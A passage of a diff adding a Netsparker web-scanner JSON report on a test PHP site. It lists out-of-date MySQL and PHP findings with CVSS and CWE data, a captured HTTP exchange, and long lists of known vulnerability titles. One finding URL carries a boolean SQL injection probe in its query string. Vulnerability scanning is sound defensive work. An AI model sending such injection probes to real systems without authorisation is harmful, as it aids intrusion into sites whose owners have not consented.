"MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient 
Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information 
Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:54 AM", + "Name": "Out-of-date Version (MySQL)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of MySQL to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Revived", + "Type": "MySqlOutOfDate", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified that you are using an out-of-date version of PHP.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.2.6" + }, + { + "Name": "Latest Version", + "Value": "8.0.7" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "df809200-a510-4daf-8722-ad48024dd66f", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP 
Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations 
within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') 
Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP DEPRECATED: Code Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": 
"Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + 
"Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": 
"PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Missing Release of Resource after Effective Lifetime Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": 